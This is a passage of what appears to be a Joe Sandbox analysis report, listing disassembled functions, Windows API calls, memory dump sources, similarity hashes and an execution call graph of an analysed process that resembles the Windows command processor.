                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D3106757503059BE764DB74A842FEB73A6EF81310F10483AE502CB192EAB5CC848396
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00035679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0003CD40,0000001C,00036901), ref: 000356A8
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00035778
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000364DB: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 0003650F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000364DB: RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00), ref: 00036545
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 000364DB: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0003CD00,00000018,?,?,0002BFD6), ref: 00036553
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1047774138-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 716146eb4e3025baa5fd1bdceedaebb5484d5e898f4703e9ad9554ec0b8b3fc9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 610cde6532a7e74ca898d209188b6c3f696836c30ec80da1335f3ea95e7d115f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 716146eb4e3025baa5fd1bdceedaebb5484d5e898f4703e9ad9554ec0b8b3fc9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8315471F08714DBDB19ABB8EC526EDB6F5AF48711F14402EE002BB2A2EE755D408B60
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00035E03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0003CCE0,0000001C,00036931), ref: 00035E32
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BCA7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: iswspace.MSVCRT ref: 0001BD1D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD39
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001BC30: wcschr.MSVCRT ref: 0001BD5D
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00035EFB
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$CloseOpeniswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2439148603-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c657350aabaed548d857256f1f098304ebf2ebda94bf2942347dd2b140246199
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 768faba384d78c8b081a76087421c95d28c5f78faa8fa2a9f486475685cd9b19
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c657350aabaed548d857256f1f098304ebf2ebda94bf2942347dd2b140246199
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B316471F147148FDB19EFB8DC526EE76B9AF48711F10402EE006B72A2EA755E408B64
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001AD26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104,?,00000000,00000000,?,?,0001B11F), ref: 0002CB8B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000000, - ,?,00000000,00000000,?), ref: 0002CC2D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b604cf8adf8b1936193eecabce9ce43f1a8825e4b4c7a2cab6a2eca8b18b24a2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e1c4fe520081e4ef5cf4c459a171d89ec226068fba58ae8df95cb08be15473e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b604cf8adf8b1936193eecabce9ce43f1a8825e4b4c7a2cab6a2eca8b18b24a2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 262149757005109BDB25A72CE895BFE77E2DBC6310F18402DE8074B745EA799D828682
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00038AA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00038AC9
                                                                                                                                                                                                                                                                                                                                                                                                                          • printf.MSVCRT ref: 00038B24
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %3d
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2845598586-2138283368
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f5da3e2c21ab49dd6500548c9adae149e6c492eeef13b9d0ec91df454c05f09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 46c0d3fdbe2900a71c837bcfd16c11f0a188a2aa4325bca8eb929af04ac24faf
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5da3e2c21ab49dd6500548c9adae149e6c492eeef13b9d0ec91df454c05f09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6012DB1610304BBFB226A559C47FDB3AADDB85BA0F444015FB09A5082D6B69D90C772
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001AB7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 287713880-1539845467
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9dbbe7606ade0d32ac816c45886dd63bdc70acc3206dd22799adddd7f403fe74
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 172538ef2c260531c63e7ecf5cafb741931611aaa3c74c048b560dcb0584f36b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9dbbe7606ade0d32ac816c45886dd63bdc70acc3206dd22799adddd7f403fe74
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE0DF3370E2A2AA5770024DBC988FBA2DB8F93B6131A001BF800E3152E7684CC080A3

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                          Execution Coverage:5%
                                                                                                                                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:10
                                                                                                                                                                                                                                                                                                                                                                                                                          execution_graph 18431 26903 18432 2690f 18431->18432 18433 26934 18432->18433 18434 2693b Sleep 18432->18434 18435 26953 _amsg_exit 18433->18435 18437 2695d 18433->18437 18434->18432 18435->18437 18436 2699f _initterm 18440 269ba __IsNonwritableInCurrentImage 18436->18440 18437->18436 18438 26980 18437->18438 18437->18440 18445 209b1 GetCurrentThreadId OpenThread 18440->18445 18504 1e2af 18445->18504 18447 209e8 HeapSetInformation RegOpenKeyExW 18448 2e9c5 RegQueryValueExW RegCloseKey 18447->18448 18449 20a18 18447->18449 18452 2e9f5 18448->18452 18514 21f5b 18449->18514 18667 163bd 18452->18667 18455 20a41 18527 187ca 8 API calls 18455->18527 18460 2ea08 18494 20a87 18460->18494 18682 21e70 18460->18682 18463 2ea58 _setjmp3 18465 2ea82 18463->18465 18466 2ea6f 18463->18466 18469 163bd 451 API calls 18465->18469 18488 2eaa4 18465->18488 18466->18465 18472 2ea73 18466->18472 18468 21e70 451 API calls 18468->18472 18473 2ea92 18469->18473 18470 2ea52 18470->18463 18471 2eab1 18474 2eac6 18471->18474 18475 2eab5 _setmode 18471->18475 18472->18468 18476 2ea3c 18472->18476 18477 34840 456 API calls 18473->18477 18693 262c0 18474->18693 18475->18474 18478 2ea9a 18477->18478 18481 21e70 451 API calls 18478->18481 18478->18488 18481->18478 18482 2eacc EnterCriticalSection LeaveCriticalSection 18485 1c570 584 API calls 18482->18485 18484 20ada exit 18484->18494 18490 2eafa 18485->18490 18487 21e70 451 API calls 18487->18494 18688 1dd98 _get_osfhandle GetFileType 18488->18688 18489 2ea32 18489->18476 18493 21e70 451 API calls 18489->18493 18490->18482 18495 2eb06 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo 18490->18495 18496 2eb75 18490->18496 18491 1e2af 4 API calls 18491->18494 18493->18489 18494->18470 18494->18484 18494->18487 18494->18489 18593 1e310 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 18494->18593 18604 1c570 18494->18604 18620 1e470 18494->18620 18497 1e2af 4 API calls 18495->18497 18496->18476 18498 21e70 451 API calls 18496->18498 18499 2eb40 18497->18499 18498->18496 18500 1e470 909 API calls 18499->18500 18501 1e310 13 API calls 18499->18501 18500->18499 18502 2eb54 GetConsoleOutputCP GetCPInfo 18501->18502 18503 1e2af 4 API calls 18502->18503 18503->18490 18505 1e2ca 18504->18505 18506 1e2bc SetThreadUILanguage 18504->18506 18507 1e2d4 GetModuleHandleW 18505->18507 18508 1e2ef 18505->18508 18506->18447 18507->18508 18510 1e307 18507->18510 18508->18510 18511 1e2f3 GetProcAddress 18508->18511 18510->18506 18512 1e30b SetThreadLocale 18510->18512 18511->18510 18512->18447 18515 21f91 18514->18515 18519 20a31 18514->18519 18516 21fab VirtualQuery 18515->18516 18515->18519 18518 21fbd 18516->18518 18516->18519 18517 21fc7 VirtualQuery 18517->18518 18517->18519 18518->18517 18518->18519 18520 21f1a GetConsoleOutputCP GetCPInfo 18519->18520 18521 2f185 GetThreadLocale 18520->18521 18522 21f39 memset 18520->18522 18524 2f196 18521->18524 18523 21f5a 18522->18523 18522->18524 18523->18455 18525 2f20b 18524->18525 18526 2f1ee memset 18524->18526 18525->18455 18526->18524 18528 1e310 13 API calls 18527->18528 18529 1884f 18528->18529 18724 1a9d4 GetEnvironmentStringsW 18529->18724 18533 1885e 18738 18273 18533->18738 18536 18873 18536->18536 18542 18b2f 18536->18542 18760 21a05 18536->18760 18538 178e4 451 API calls 18540 18b42 18538->18540 19058 27d18 18540->19058 18541 188a5 GetCommandLineW 18543 188b8 18541->18543 18542->18538 18765 1e3f0 18543->18765 18548 188e1 18776 18e9e 18548->18776 18594 1e343 18593->18594 18595 1e357 _get_osfhandle GetConsoleMode 18593->18595 18594->18595 18597 1e3bc _get_osfhandle SetConsoleMode 18594->18597 18596 1e372 18595->18596 18600 1e3ba GetConsoleOutputCP GetCPInfo 18595->18600 18598 1e381 _get_osfhandle SetConsoleMode 18596->18598 18599 1e3a0 18596->18599 18597->18595 18601 1e3df 18597->18601 18598->18599 18599->18600 18603 1e3b8 SetConsoleInputExeNameW 18599->18603 18600->18491 18601->18595 18602 2dc1d _get_osfhandle SetConsoleMode 18601->18602 18602->18595 18603->18600 18605 1c5d3 18604->18605 18606 1c594 18604->18606 18608 1c695 VirtualFree 18605->18608 18609 1c5fe _setjmp3 18605->18609 18606->18605 18607 1c59e GetProcessHeap RtlFreeHeap 18606->18607 18607->18605 18607->18606 18608->18605 18619 1c666 18608->18619 18610 1c63c 18609->18610 18613 1c683 18609->18613 20252 1a8c4 18610->20252 18613->18494 18614 1c66f 18614->18613 20281 38791 18614->20281 18615 1c64d 18615->18614 20263 1cc70 18615->20263 18617 2d0f0 18617->18617 18619->18614 20272 38959 18619->20272 18621 1e517 18620->18621 18622 1e48a 18620->18622 18621->18494 18622->18621 18623 1e4cc 18622->18623 18624 1e4ae memset 18622->18624 18626 1e5ad 18623->18626 18627 1e501 18623->18627 18634 1e4d9 18623->18634 20956 1e670 18624->20956 18630 1dcd0 451 API calls 18626->18630 18627->18621 18640 1e670 460 API calls 18627->18640 18628 1e572 20989 19ef2 memset 18628->20989 18629 1e4e9 18631 1e531 18629->18631 18632 1e4ef 18629->18632 18633 1e5b7 18630->18633 18637 1e544 18631->18637 18638 1e55f 18631->18638 20885 1ad60 GetConsoleTitleW 18632->20885 18633->18627 18645 1e5eb 18633->18645 21094 1ed90 18633->21094 18634->18628 18634->18629 18642 1e588 18637->18642 18643 1e54c 18637->18643 20984 1ab50 18638->20984 18640->18621 18641 1e583 18641->18627 21039 20390 18642->21039 18648 1e592 18643->18648 18649 1e554 18643->18649 18660 1e5f0 18645->18660 21128 257ea 18645->21128 18654 1e4f6 18648->18654 21042 20740 18648->21042 20971 203b0 18649->20971 18652 1e631 18652->18627 18658 1dcd0 451 API calls 18652->18658 18654->18627 18656 1a125 2 API calls 18654->18656 18656->18627 18657 1f410 467 API calls 18657->18645 18659 1e641 18658->18659 18659->18627 18661 1e64b 18659->18661 18662 19ef2 462 API calls 18660->18662 18663 1ec2e 451 API calls 18661->18663 18664 1e5f9 18662->18664 18663->18660 18664->18627 21098 22081 18664->21098 18668 1790c 451 API calls 18667->18668 18669 163dc 18668->18669 18670 34840 GetStdHandle 18669->18670 18671 163bd 451 API calls 18670->18671 18672 3485e 18671->18672 18673 348c5 18672->18673 18674 1dd98 6 API calls 18672->18674 18675 19950 451 API calls 18673->18675 18678 3486b 18674->18678 18676 348cf 18675->18676 18676->18460 18677 348b5 18680 34799 451 API calls 18677->18680 18678->18677 18679 34878 FlushConsoleInputBuffer _getch 18678->18679 18679->18673 18681 34891 EnterCriticalSection LeaveCriticalSection 18679->18681 18680->18673 18681->18673 22511 21ea6 18682->22511 18684 21e7c 18685 21e82 18684->18685 18686 18bc7 449 API calls 18684->18686 18685->18460 18687 21e92 GetProcessHeap RtlFreeHeap 18686->18687 18687->18685 18689 1ddbd 18688->18689 18690 1ddca 18688->18690 18689->18471 18691 1ddd6 GetStdHandle 18690->18691 18692 1ddde AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 18690->18692 18691->18692 18692->18689 22519 2643a NtOpenThreadToken 18693->22519 18696 31ef3 RtlNtStatusToDosError SetLastError 18698 31f01 18696->18698 18697 26302 18697->18698 18699 31f51 18697->18699 18700 26319 18697->18700 18702 1ab7f 2 API calls 18698->18702 18719 31fdc 18698->18719 18701 31f59 GetConsoleTitleW 18699->18701 22528 2640a FormatMessageW 18700->22528 18704 31f79 wcsstr 18701->18704 18706 263c1 18701->18706 18714 26395 18702->18714 18704->18706 18707 31f92 18704->18707 18705 263d8 18710 263e2 LocalFree 18705->18710 18711 263e9 18705->18711 18706->18705 18709 1dc60 2 API calls 18706->18709 18706->18719 18713 31fa0 wcsstr 18707->18713 18708 31f3d 18712 178e4 451 API calls 18708->18712 18709->18705 18710->18711 18711->18708 18717 263f1 18711->18717 18716 31f4a 18712->18716 18713->18706 18713->18713 18714->18706 18714->18708 18722 263b4 SetConsoleTitleW 18714->18722 18715 26332 18715->18705 18715->18708 18720 1dcd0 451 API calls 18715->18720 18716->18482 18718 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18717->18718 18721 26400 18718->18721 18723 26369 18720->18723 18721->18482 18722->18706 18723->18701 18723->18705 18723->18714 18725 1a9e6 18724->18725 18726 18854 18724->18726 18727 1a9ee GetProcessHeap RtlAllocateHeap 18725->18727 18730 18b96 GetProcessHeap HeapAlloc 18726->18730 18728 1aa11 FreeEnvironmentStringsW 18727->18728 18729 1aa06 memcpy 18727->18729 18728->18726 18729->18728 18731 2b5ce 18730->18731 18732 18bb4 18730->18732 18731->18533 18733 1a9d4 5 API calls 18732->18733 18734 18bb9 18733->18734 18735 2b5b2 GetProcessHeap RtlFreeHeap 18734->18735 18736 18bc3 18734->18736 18737 178e4 451 API calls 18735->18737 18736->18533 18737->18731 18759 18282 18738->18759 18739 182bd RegOpenKeyExW 18740 182e1 RegQueryValueExW 18739->18740 18739->18759 18741 18321 RegQueryValueExW 18740->18741 18740->18759 18743 18371 RegQueryValueExW 18741->18743 18741->18759 18742 18552 time srand 18744 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18742->18744 18745 183ab RegQueryValueExW 18743->18745 18743->18759 18746 18570 GetCommandLineW 18744->18746 18748 183fb RegQueryValueExW 18745->18748 18745->18759 18746->18536 18747 2b11a _wtol 18747->18741 18751 1846c RegQueryValueExW 18748->18751 18748->18759 18749 2b146 _wtol 18749->18743 18750 2b18e _wtol 18750->18745 18751->18759 18752 2b1ba wcstol 18752->18759 18753 2b1dc wcstol 18753->18759 18754 2b218 wcstol 18754->18759 18755 184fa RegQueryValueExW 18756 18534 RegCloseKey 18755->18756 18755->18759 18756->18759 18757 2b28c ExpandEnvironmentStringsW 18757->18759 18759->18739 18759->18741 18759->18742 18759->18743 18759->18745 18759->18747 18759->18748 18759->18749 18759->18750 18759->18751 18759->18752 18759->18753 18759->18754 18759->18755 18759->18756 18759->18757 19062 1acb0 18759->19062 19072 26e25 18760->19072 18762 21a27 18763 1889a 18762->18763 18764 21a2f memset 18762->18764 18763->18541 18763->18542 18764->18763 18766 1e405 18765->18766 18774 188d9 18765->18774 18767 26e25 4 API calls 18766->18767 18768 1e422 18767->18768 18769 2dc4a 18768->18769 18770 1e42d 18768->18770 19084 334d4 18769->19084 18772 1e441 memset 18770->18772 18773 2dc6b ??_V@YAXPAX 18770->18773 18772->18774 18774->18542 18774->18548 18777 18ec1 GetCurrentDirectoryW 18776->18777 18778 18ede towupper 18776->18778 18784 18ec9 18777->18784 19154 1ec2e GetEnvironmentVariableW 18778->19154 18780 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 18782 188fc 18780->18782 18785 200e9 memset 18782->18785 18783 2b787 towupper 18784->18780 18786 1e3f0 17 API calls 18785->18786 18787 2013e 18786->18787 18788 20146 18787->18788 18789 2e615 18787->18789 18790 20151 GetModuleFileNameW 18788->18790 18791 2e627 18788->18791 18792 21e70 451 API calls 18789->18792 18794 2e61f exit 18789->18794 18793 1ec2e 451 API calls 18790->18793 19297 1a976 18791->19297 18792->18789 18795 20168 18793->18795 18794->18791 18795->18791 18797 20170 18795->18797 18799 1ec2e 451 API calls 18797->18799 18798 2e63e 18802 1a976 8 API calls 18798->18802 18800 2017c 18799->18800 18800->18798 18801 20184 18800->18801 18803 1ec2e 451 API calls 18801->18803 18804 2e64f 18802->18804 18805 20190 18803->18805 18807 1a976 8 API calls 18804->18807 18805->18804 19059 27d1d 19058->19059 19060 21e70 451 API calls 19059->19060 19061 27d28 exit 19059->19061 19060->19059 19063 1acc0 19062->19063 19063->19063 19066 1dcd0 19063->19066 19065 1acd8 19065->18759 19067 2d9da 19066->19067 19068 1dcde GetProcessHeap HeapAlloc 19066->19068 19070 178e4 449 API calls 19067->19070 19068->19067 19069 1dcf6 19068->19069 19069->19065 19071 2d9e3 19070->19071 19071->19065 19073 26e30 __EH_prolog3_catch 19072->19073 19076 2742d 19073->19076 19075 26e48 19075->18762 19077 27441 malloc 19076->19077 19078 27434 _callnewh 19077->19078 19079 2744f 19077->19079 19078->19077 19080 27451 19078->19080 19079->19075 19083 274d1 ??0exception@@QAE@ABQBDH 19080->19083 19082 277ec _CxxThrowException 19083->19082 19087 3345e 19084->19087 19090 332e4 19087->19090 19091 332f6 19090->19091 19098 32e74 19091->19098 19094 333a9 19095 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19094->19095 19097 333ba 19095->19097 19097->18774 19099 32ea3 19098->19099 19100 32ead 19098->19100 19099->19100 19101 3345e 9 API calls 19099->19101 19102 32f1d GetCurrentThreadId 19100->19102 19101->19100 19103 32f6c 19102->19103 19104 33061 19103->19104 19114 32e37 19103->19114 19106 33036 OutputDebugStringW 19109 32fe7 19106->19109 19109->19094 19110 3392b 19109->19110 19111 33941 19110->19111 19112 3394c memset 19110->19112 19111->19112 19113 3397a 19112->19113 19115 32e42 19114->19115 19117 32e4e 19114->19117 19116 32e5d IsDebuggerPresent 19115->19116 19115->19117 19116->19117 19117->19106 19117->19109 19118 32859 19117->19118 19121 32885 19118->19121 19128 32a23 19118->19128 19119 26b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 19120 32a60 19119->19120 19120->19106 19122 3290d FormatMessageW 19121->19122 19121->19128 19123 32963 19122->19123 19124 3294c 19122->19124 19126 33067 _vsnwprintf 19123->19126 19147 33067 19124->19147 19127 3295e 19126->19127 19128->19119 19150 19a8d 19147->19150 19151 19a98 19150->19151 19155 1ec64 19154->19155 19157 18f0d 19154->19157 19156 1ec71 _wcsicmp 19155->19156 19155->19157 19158 1ec87 _wcsicmp 19156->19158 19167 1ed59 19156->19167 19157->18783 19157->18784 